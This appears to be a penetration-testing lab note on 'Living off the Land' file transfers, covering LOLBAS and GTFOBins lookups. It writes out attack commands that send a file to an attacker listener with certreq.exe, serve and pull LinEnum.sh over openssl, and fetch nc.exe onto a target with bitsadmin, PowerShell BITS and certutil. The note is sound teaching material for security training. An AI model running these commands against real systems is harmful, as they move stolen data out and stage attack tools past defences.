Living Off The Land
There are currently two websites that aggregate information on Living off the Land binaries:
Living off the Land binaries can be used to perform functions such as:
Download
Upload
Command Execution
File Read
File Write
Bypasses
LOLBAS (Windows)
To search for download and upload functions in LOLBAS we can use /download or /upload.
Example with CertReq.exe:
We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.
certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.iniGTFOBins (Linux)
To search for the download and upload function in GTFOBins for Linux Binaries, we can use +file download or +file upload.
Attacker machine
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pemopenssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.shTarget
Download the file from the attacker with
openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.shBitsadmin Download function
The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" checks host and network utilization into account to minimize the impact on a user's foreground work.
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exePowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"Certutil
Casey Smith (@subTee) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exeLast updated